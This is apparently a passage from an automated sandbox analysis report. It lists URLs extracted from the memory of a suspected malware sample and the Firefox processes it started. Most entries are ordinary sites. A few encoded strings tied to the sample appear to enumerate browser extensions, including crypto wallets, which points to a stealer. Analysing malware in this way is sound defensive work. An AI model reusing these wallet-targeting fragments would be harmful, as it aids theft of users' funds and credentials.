Source: firefox.exe, 00000021.00000003.3206351859.0000016DE66CA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3216728852.0000016DE4931000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.ca/sch/
Source: firefox.exe, 00000021.00000003.3206351859.0000016DE66CA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3216728852.0000016DE4931000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.ch/
Source: firefox.exe, 00000021.00000003.3206351859.0000016DE66CA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3216728852.0000016DE4931000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.ch/sch/
Source: firefox.exe, 00000021.00000003.3158551690.0000016DE97BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3216728852.0000016DE4931000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3141974172.0000016DDE0AA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.co.uk/
Source: firefox.exe, 00000021.00000003.3216728852.0000016DE4931000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.co.uk/sch/
Source: firefox.exe, 00000021.00000003.3216728852.0000016DE4931000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202842273.0000016DEA8B2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3211240177.0000016DEA8B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.com.au/
Source: firefox.exe, 00000021.00000003.3216728852.0000016DE4931000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202842273.0000016DEA8B2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3211240177.0000016DEA8B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.com.au/sch/
Source: firefox.exe, 00000021.00000003.3204250209.0000016DE9EB1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3211240177.0000016DEA873000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202842273.0000016DEA873000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202514292.0000016DEA8C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.com/
Source: firefox.exe, 00000021.00000003.3204250209.0000016DE9EB1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3211240177.0000016DEA873000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202842273.0000016DEA873000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202514292.0000016DEA8C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.com/sch/
Source: firefox.exe, 00000021.00000003.3158551690.0000016DE97BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3216728852.0000016DE4931000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3141974172.0000016DDE0AA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3212471692.0000016DE97D1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3215505857.0000016DE4BC8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.de/
Source: firefox.exe, 00000021.00000003.3216728852.0000016DE4931000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3215505857.0000016DE4BC8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.de/sch/
Source: firefox.exe, 00000021.00000003.3216728852.0000016DE4931000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3211896336.0000016DEA822000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.es/
Source: firefox.exe, 00000021.00000003.3216728852.0000016DE4931000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3211896336.0000016DEA822000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.es/sch/
Source: firefox.exe, 00000021.00000003.3206351859.0000016DE66CA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3216728852.0000016DE4931000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.fr/
Source: firefox.exe, 00000021.00000003.3206351859.0000016DE66CA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3216728852.0000016DE4931000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.fr/sch/
Source: firefox.exe, 00000021.00000003.3216728852.0000016DE495F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.ie/
Source: firefox.exe, 00000021.00000003.3216728852.0000016DE495F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.ie/sch/
Source: firefox.exe, 00000021.00000003.3216728852.0000016DE4931000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3215505857.0000016DE4BC8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.it/
Source: firefox.exe, 00000021.00000003.3216728852.0000016DE4931000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3215505857.0000016DE4BC8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.it/sch/
Source: firefox.exe, 00000021.00000003.3216728852.0000016DE4931000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.nl/
Source: firefox.exe, 00000021.00000003.3216728852.0000016DE4931000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.nl/sch/
Source: file.exe, 00000000.00000002.2443461235.000000000278C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: firefox.exe, 00000021.00000003.3128000136.0000016DDE287000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3204250209.0000016DE9EB1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3221635085.0000016DE6BF9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3156750421.0000016DEA318000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3128160260.0000016DDE27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3215505857.0000016DE4B2D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3163108384.0000016DE4B28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.fastcompany.com/91161368/experts-say-the-gender-pay-gap-may-never-go-away?utm_source=poc
Source: firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google-analytics.com
Source: firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: firefox.exe, 00000021.00000003.3221850152.0000016DE67A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: firefox.exe, 00000021.00000003.2958312592.0000016DDF977000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2953642125.0000016DDF973000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search
Source: firefox.exe, 00000021.00000003.2813756993.0000016DDD36B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2811196569.0000016DDD350000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2809919292.0000016DDD336000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2809382625.0000016DDD100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2814195790.0000016DDD383000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2809662680.0000016DDD31C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
Source: file.exe, 00000000.00000002.2443461235.000000000278C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: firefox.exe, 00000021.00000003.3215505857.0000016DE4B6A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3165602215.0000016DEA9EE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3166260392.0000016DEA9DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2809662680.0000016DDD31C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search
Source: firefox.exe, 00000021.00000003.2987016191.0000016DDF1FC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2986300787.0000016DDF2C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search?client=firefox-b-d&q=
Source: firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/tools/feedback/
Source: firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/tools/feedback/chat_load.js
Source: firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/tools/feedback/load.js
Source: firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/tools/feedback/open.js
Source: firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com
Source: firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com
Source: firefox.exe, 00000021.00000003.3203736370.0000016DEA336000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3212719724.0000016DE97AE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/
Source: firefox.exe, 00000021.00000003.3212719724.0000016DE97AE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/1
Source: firefox.exe, 00000021.00000003.3217482927.0000016DE077C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3211896336.0000016DEA82F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.5_pF0xwhc8s.es5.O
Source: firefox.exe, 00000021.00000003.3202373857.0000016DECCDF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3210911621.0000016DEA8D4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/feedback/js/ghelp/;
Source: firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/feedback/js/ghelp/;report-uri
Source: firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/feedback/js/help/prod/service/lazy.min.js
Source: firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/inproduct_help/
Source: firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/inproduct_help/api/main.min.js
Source: firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/inproduct_help/chatsupport/chatsupport_button_v2.js
Source: firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/inproduct_help/service/lazy.min.js
Source: firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/support/content/
Source: firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/uservoice/feedback/client/web/live/main_light_binary.js
Source: firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/uservoice/surveys/resources/prod/js/survey/
Source: firefox.exe, 00000021.00000003.3212471692.0000016DE97E6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3158551690.0000016DE97E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.hotels.com/?locale=en_US&pos=HCOM_US&siteid=300000001&rffrid=sem.hcom.US.AMP.003.00.03.s
Source: firefox.exe, 00000021.00000003.3158551690.0000016DE97BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3141974172.0000016DDE0AA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3212471692.0000016DE97D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ifeng.com/
Source: firefox.exe, 00000021.00000003.3158551690.0000016DE97BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3212471692.0000016DE97D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.iqiyi.com/
Source: firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.jezebel.com/have-the-olympic-beds-always-been-this-bad?utm_source=pocket-newtab-en-us
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.latimes.com/sports/olympics/story/2024-07-23/simone-biles-yurchenko-double-pick-paris?ut
Source: firefox.exe, 00000021.00000003.3158551690.0000016DE97BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3212471692.0000016DE97D1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3128258779.0000016DDE270000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.leboncoin.fr/
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.motherjones.com/politics/2024/07/joe-biden-climate-legacy-donald-trump-kamala-harris/?ut
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.motherjones.com/wp-content/uploads/2024/07/202407-24-biden-harris.jpg?w=1200&h=630&crop=
Source: firefox.exe, 00000021.00000003.3158551690.0000016DE9776000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3158551690.0000016DE9763000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3158551690.0000016DE977A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3212719724.0000016DE977C000.00000004.00000800.00020000.00000000.sdmp, places.sqlite.33.dr String found in binary or memory: https://www.mozilla.org
Source: file.exe, 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmp, firefox.exe, 00000021.00000003.3165123543.0000016DDEA80000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: firefox.exe, 00000021.00000003.3216406927.0000016DE49BF000.00000004.00000800.00020000.00000000.sdmp, places.sqlite.33.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: firefox.exe, 00000021.00000003.3128000136.0000016DDE287000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3126198363.0000016DE68B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3125801220.0000016DEA264000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3121392395.0000016DE68C1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3122392806.0000016DE68AE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3124555602.0000016DE68D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3124692516.0000016DE68AE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/
Source: file.exe, 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmp, firefox.exe, 00000021.00000003.3165123543.0000016DDEA80000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: firefox.exe, 00000021.00000003.3216406927.0000016DE49BF000.00000004.00000800.00020000.00000000.sdmp, places.sqlite.33.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: firefox.exe, 00000021.00000003.3204250209.0000016DE9EEC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3158429296.0000016DE9EE4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3212266661.0000016DE9EEC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/firefox/127.0/releasenotes/
Source: firefox.exe, 00000021.00000003.3221424465.0000016DE9747000.00000004.00000800.00020000.00000000.sdmp, targeting.snapshot.json.tmp.33.dr String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/0x1024
Source: file.exe, 00000000.00000003.2190665391.000000002EF4A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3216406927.0000016DE49BF000.00000004.00000800.00020000.00000000.sdmp, places.sqlite.33.dr String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: firefox.exe, 00000021.00000003.3216406927.0000016DE49BF000.00000004.00000800.00020000.00000000.sdmp, places.sqlite.33.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 00000021.00000003.3165123543.0000016DDEA80000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon-196x196.2af054fea211.png
Source: firefox.exe, 00000021.00000003.3165123543.0000016DDEA80000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon.d25d81d39065.icox
Source: file.exe, 00000000.00000003.2190665391.000000002EF4A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3216406927.0000016DE49BF000.00000004.00000800.00020000.00000000.sdmp, places.sqlite.33.dr String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: file.exe, 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmp, firefox.exe, 00000028.00000002.3286697948.00000221E20CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002D.00000002.3283706595.0000022B015CF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: file.exe, 00000000.00000003.2190665391.000000002EF4A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3216406927.0000016DE49BF000.00000004.00000800.00020000.00000000.sdmp, places.sqlite.33.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: file.exe, 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/kZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGp
Source: file.exe, 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/vRm9ybXxwbmxjY21vamNtZW9obHBnZ21mbmJiaWFwa21ibGlvYnwxfDB8MHx
Source: firefox.exe, 00000021.00000003.2872801163.0000016DDF8BF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2984375808.0000016DDF8BF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.nationalgeographic.com/animals/article/cocaine-sharks-brazil-pollution-contaminated-wate
Source: firefox.exe, 00000021.00000003.3158551690.0000016DE97BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3212471692.0000016DE97D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.olx.pl/
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.outsideonline.com/food/food-culture/what-is-american-wagyu/?utm_source=pocket-newtab-en-
Source: firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.outsideonline.com/outdoor-adventure/olympics/salt-lake-city-hosts-2034-winter-olympics/?
Source: firefox.exe, 00000021.00000003.3216319694.0000016DE4B24000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3215505857.0000016DE4B2D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.reddit.com/
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.romper.com/life/i-quit-cooking-family-mealtime-weeknight?utm_source=pocket-newtab-en-us
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.runnersworld.com/gear/a60891571/can-your-garmin-watch-replace-a-coach/?utm_source=pocket
Source: firefox.exe, 00000021.00000003.3163179964.0000016DE4B24000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3216319694.0000016DE4B24000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.sling.com/
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.themarshallproject.org/2024/07/25/police-mental-health-alternative-911?utm_source=pocket
Source: firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.thetakeout.com/1622553/ice-cube-secret-ingredient-grilled-cheese/?utm_source=pocket-newt
Source: firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.thetakeout.com/img/gallery/hear-us-out-ice-cubes-are-the-secret-to-amping-up-grilled-che
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.wired.com/story/amoc-collapse-atlantic-ocean/?utm_source=pocket-newtab-en-us
Source: firefox.exe, 00000021.00000003.3158551690.0000016DE97BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3212471692.0000016DE97D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.wykop.pl/
Source: firefox.exe, 00000021.00000003.3164533070.0000016DDEAF8000.00000004.00000800.00020000.00000000.sdmp, places.sqlite.33.dr String found in binary or memory: https://www.youtube.com
Source: firefox.exe, 00000021.00000003.3216319694.0000016DE4B24000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3215505857.0000016DE4B2D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002D.00000002.3283706595.0000022B01503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: firefox.exe, 00000021.00000003.2984375808.0000016DDF8A8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2794491755.0000016DCE8D5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3282835116.00000221E1E3A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3282835116.00000221E1E30000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3295117428.00000221E2134000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3295117428.00000221E2130000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002D.00000002.3292463596.0000022B01654000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002D.00000002.3282362582.0000022B012EA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002D.00000002.3282362582.0000022B012E0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002D.00000002.3292463596.0000022B01650000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account
Source: firefox.exe, 00000020.00000002.2795766765.00000260EA7D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account--attempting-deelevation
Source: firefox.exe, 0000001D.00000002.2773519559.00000291F3949000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account9
Source: firefox.exe, 00000021.00000003.2794491755.0000016DCE8FB000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3282835116.00000221E1E30000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3295117428.00000221E2134000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3295117428.00000221E2130000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002D.00000002.3292463596.0000022B01654000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002D.00000002.3282362582.0000022B012E0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002D.00000002.3292463596.0000022B01650000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:
Source: firefox.exe, 0000001D.00000002.2773519559.00000291F3949000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountUSERDOMAIN=user
Source: firefox.exe, 0000001D.00000003.2737509112.00000291F395E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2750122014.00000291F396F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2773519559.00000291F3970000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountUSERDOMAIN=user-PCS
Source: firefox.exe, 0000001D.00000002.2773519559.00000291F3970000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=alfon
Source: firefox.exe, 00000021.00000003.3216406927.0000016DE49BF000.00000004.00000800.00020000.00000000.sdmp, places.sqlite.33.dr String found in binary or memory: https://www.youtube.com/accountmoc.ebutuoy.www.
Source: firefox.exe, 00000021.00000003.3204676713.0000016DE9EA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/signin?action_handle_signin%253Dtrue%2526app%253Ddesktop%2526hl%253Den%2526n
Source: firefox.exe, 00000021.00000003.3141974172.0000016DDE0A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.zhihu.com/
Source: firefox.exe, 00000021.00000003.2967575994.0000016DE04A9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://xhr.spec.whatwg.org/#sync-warning
